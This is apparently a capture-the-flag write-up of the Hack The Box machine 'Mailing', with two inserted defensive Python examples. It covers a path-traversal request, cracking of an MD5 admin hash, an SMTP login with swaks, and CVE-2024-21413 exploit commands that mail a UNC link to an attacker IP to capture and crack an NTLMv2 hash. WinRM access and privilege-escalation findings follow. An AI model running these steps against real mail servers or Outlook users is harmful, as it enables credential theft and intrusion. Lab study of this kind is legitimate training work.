## Recon

### WAPP - 80

![[Pasted image 20250226171859.png]]

![[Pasted image 20250226171914.png]]

Download mail instructions

![[Pasted image 20250226172530.png]]

### [hMailServer](https://www.hmailserver.com/)

![[Pasted image 20250226172747.png]]

```
993/tcp open ssl/imap syn-ack ttl 127 hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/organizationalUnitName=MAILING/[email protected]/localityName=Madrid
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/organizationalUnitName=MAILING/[email protected]/localityName=Madrid
```

We may have a username: `[email protected]`

## Initial Access

### Discovering LFI

```
GET /download.php?file=../../../Program%20Files%20(x86)\hMailServer\Bin\hMailServer.ini HTTP/1.1
Host: mailing.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mailing.htb/
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```

```
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
```

### Password Cracking

#### Administrator password: `841bb5acfa6779ae432fd7a4e6600ba7`

```
╭─[λ]-[~/targets/mailing/1_initial-access]-[10.10.11.14]
╰─> john --wordlist=/home/noctua/arsenal/wordlists/rockyou.txt admin-MD5.hash --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Note: Passwords longer than 18 [worst case UTF-8] to 55 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
homenetworkingadministrator (?)
1g 0:00:00:00 DONE (2025-02-26 19:52) 2.381g/s 18005Kp/s 18005Kc/s 18005KC/s homerandgiego..homeiyun88
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
```

`homenetworkingadministrator`

How the hell do we leverage this? I took another hint from IPPSEC, who just logged in using `administrator` on the SMTP server.

#### MSSQLCE Password: `0a9f8ad8bf896b501dde74f08efd7e4c`

> AdministratorPassword - The main hMailServer administration password. The user for example needs to enter this password when starting hMailServer Administrator. This password is encoded using MD5.

> Username - hMailServer will use this username when connecting to the database server. If it's left empty, and MSSQL is used, hMailServer will try to use Windows Authentication.

> Passwordencryption - If set to 1, the database password is encrypted using blowfish. In this case, the hMailServer service decodes the password before connecting to the database.

> 1 - Blowfish. Store passwords encrypted using Blowfish. This is not recommended, since the password used for encryption is known. Hence, this is no more safe than option 0.

### SMTP Authentication

After some fuckery and an additional hint, I realised that there's a tool named `swaks` which lets me interact with SMTP servers through the command line. Another thing I missed was simply guessing the "[email protected]" account....
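Before the swaks exchange itself (shown next), here is an added defender-side illustration that is not part of the original writeup: it parses a swaks-style transcript (`->` client, `<-` server), records what EHLO advertised, and decodes the AUTH LOGIN answers, which is exactly what anyone watching port 25 would recover since the server never offered STARTTLS. The embedded transcript is the AUTH portion of the exchange on this page, used as sample input.

```python
"""What an on-path observer recovers from an SMTP AUTH LOGIN exchange (added example)."""
import base64
# The AUTH portion of the exchange captured against mailing.htb on this page, as sample input.
TRANSCRIPT = """\
-> EHLO admin.konstantinovitz.com
<- 250-mailing.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN PLAIN
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> YWRtaW5pc3RyYXRvckBtYWlsaW5nLmh0Yg==
<- 334 UGFzc3dvcmQ6
-> aG9tZW5ldHdvcmtpbmdhZG1pbmlzdHJhdG9y
<- 235 authenticated.
"""

def _b64(text: str) -> str:
    """Decode one base64 token; anything that is not base64 comes back unchanged."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8", "replace")
    except ValueError:
        return text

def analyse_auth_login(transcript: str) -> dict:
    """EHLO capabilities, any credential sent in clear, and defender findings."""
    r = {"auth_mechs": [], "starttls_offered": False, "username": None, "password": None}
    expecting = None  # which prompt (username/password) the next client line answers
    for line in transcript.splitlines():
        line = line.strip()
        if line.startswith("<-"):
            reply = line[2:].lstrip()            # e.g. "250-AUTH LOGIN PLAIN"
            code, text = reply[:3], reply[4:]
            if code == "250":                    # EHLO capability lines
                keyword, _, rest = text.partition(" ")
                if keyword.upper() == "STARTTLS":
                    r["starttls_offered"] = True
                elif keyword.upper() == "AUTH":
                    r["auth_mechs"] = rest.split()
            elif code == "334":                  # server prompt, itself base64
                prompt = _b64(text).rstrip(":").lower()
                expecting = prompt if prompt in ("username", "password") else None
        elif line.startswith("->") and expecting:
            r[expecting] = _b64(line[2:].strip())   # base64 is encoding, not encryption
            expecting = None
    r["findings"] = []
    if set(r["auth_mechs"]) & {"LOGIN", "PLAIN"} and not r["starttls_offered"]:
        r["findings"].append("plaintext AUTH mechanisms offered without STARTTLS")
    if r["username"] and r["password"]:
        r["findings"].append(f"credential recoverable from capture: {r['username']}")
    return r
```

The same parser run over a server that advertises `250-STARTTLS` reports nothing for the mechanism check, which is the configuration a mail admin should be aiming for on 25/587.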
So we test out authentication:

```
╭─[λ]-[~/targets/mailing/1_initial-access]-[10.10.11.14]
╰─> swaks --auth-user '[email protected]' --auth LOGIN --auth-password homenetworkingadministrator --quit-after AUTH --server mailing.htb
=== Trying mailing.htb:25...
=== Connected to mailing.htb.
<- 220 mailing.htb ESMTP
-> EHLO admin.konstantinovitz.com
<- 250-mailing.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN PLAIN
<- 250 HELP
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> YWRtaW5pc3RyYXRvckBtYWlsaW5nLmh0Yg==
<- 334 UGFzc3dvcmQ6
-> aG9tZW5ldHdvcmtpbmdhZG1pbmlzdHJhdG9y
<- 235 authenticated.
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
```

### CVE-2024-21413 - MonikerLink

> A vulnerability has been discovered in Microsoft Outlook known as "MonikerLink," which allows an attacker to obtain NTLM hashes and execute arbitrary remote code on a victim machine by exploiting some specially crafted hyperlinks within an email to bypass the protected view of Outlook.

![](https://ik.imagekit.io/14sfaswy6hrz/images/clysjifazg3jo1gn926n1d4qn.png)

So [here's](https://www.vicarius.io/vsociety/posts/monikerlink-critical-vulnerability-in-ms-outlook-cve-2024-21413) a noice writeup on the CVE in question. I didn't understand the nitty-gritty details, to say the least... but I grokked the execution steps:

- We start by downloading source code for the CVE
- Fire up [[Responder]] on our attacker machine
- Receive the NTLM hashes

I had no clue how to find this CVE or even to think to look for it in the first place...
**CVE execution:**

```sh
python CVE-2024-21413.py --server mailing.htb --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --subject "hello-mudda-focxa" --url "\\10.10.14.11\test\crack"
```

```sh
python CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.14.11\share\sploit" --subject "hax"
```

And we receive a hash (truncated here):

```
maya::MAILING:b336e8fe619789a
```

Which we'll crack:

```
╭─[λ]-[~/targets/mailing/1_initial-access]-[10.10.11.14]
╰─> john --wordlist=/home/noctua/arsenal/wordlists/rockyou.txt mayas-NTLMv2-SSP.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
m4y4ngs4ri (maya)
1g 0:00:00:02 DONE (2025-02-27 11:29) 0.4525g/s 2685Kp/s 2685Kc/s 2685KC/s m61403..m379010
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```

`maya:m4y4ngs4ri`

And finally leverage for initial access via WinRM:

`evil-winrm -i $RHOST -u maya -p m4y4ngs4ri`

## Privesc - Maya

```
╔══════════╣ Checking write permissions in PATH folders (DLL Hijacking)
╚ Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\
    C:\Windows\System32\OpenSSH\
    C:\Program Files\Git\cmd
    C:\Program Files\dotnet\
    (DLL Hijacking) C:\Users\maya\AppData\Local\Programs\Python\Python312: maya [AllAccess]

╔══════════╣ Scheduled Applications --Non Microsoft--
╚ Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
    (MAILING\maya) MailPython: python.exe C:\Users\maya\Documents\mail.py
    Permissions file: maya [AllAccess]
    Permissions folder(DLL Hijacking): maya [AllAccess]
    Trigger: At log on of MAILING\maya
```

```
*Evil-WinRM* PS C:\Program Files\libreoffice\readmes> cat readme_en-GB.txt
======================================================================
LibreOffice 7.4 ReadMe
======================================================================
```

## Lessons Learned

- Missed the download thingy: was too rushed; was sure it was just me who sucked at SMTP enumeration blabla
- Couldn't get the path thingy to work... Need a baseline LFI query thingy like /etc/passwd: `../../../../../windows/system32/license.rtf` (how did the writeup author figure out that it needed to be this exact nesting level?).
- Had to take a hint for task 5: "What is the 2024 CVE ID for a vulnerability Windows Mail client that can lead to the leak of the users credentials?"
- Leverage file disclosures to have the application disclose its own source code
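As a defender-side companion to the `download.php` traversal used above, here is an added containment check (example code, not the box's PHP and not the writeup author's): it decodes the `?file=` value once, treats `/` and `\` alike because the working payload used backslashes against a Windows host, rejects rooted, drive and UNC paths and any `..` component, and finally confirms the resolved target still sits under the download folder. The base directory and the inputs other than the page's own payload are constructed for the demonstration.

```python
"""Containment check for a ?file= download parameter (added example, not the box's download.php)."""
from pathlib import Path, PureWindowsPath
from urllib.parse import unquote

# Constructed base directory; a real handler would point at its own downloads folder.
BASE_DIR = "/tmp/mailing-demo-downloads"
# The traversal string sent to download.php on this page (percent-encoded, backslash separators).
PAGE_PAYLOAD = r"../../../Program%20Files%20(x86)\hMailServer\Bin\hMailServer.ini"

def check_download(base_dir: str, requested: str) -> tuple[bool, str]:
    """Return (allowed, detail): the resolved path when safe, otherwise why it was rejected.

    The value is decoded exactly once, so a double-encoded '%252e' stays a literal
    file name and never turns into '..' later. Windows path rules are applied to the
    decoded string so both separators are recognised, then the resolved candidate is
    checked against base_dir as a last line of defence (catches symlink escapes).
    """
    base = Path(base_dir).resolve()
    decoded = unquote(requested)                        # %20 -> space, %2e -> '.'
    win = PureWindowsPath(decoded.replace("/", "\\"))   # one parser for '/' and '\'
    if not win.parts:
        return False, "empty file name rejected"
    if win.drive or win.root:                           # C:\..., \\host\share\..., \...
        return False, f"absolute, drive or UNC path rejected: {decoded}"
    if ".." in win.parts:
        return False, f"parent-directory reference rejected: {decoded}"
    candidate = base.joinpath(*win.parts).resolve()
    if base not in candidate.parents:                   # must be strictly inside base_dir
        return False, f"resolved outside base directory: {candidate}"
    return True, str(candidate)
```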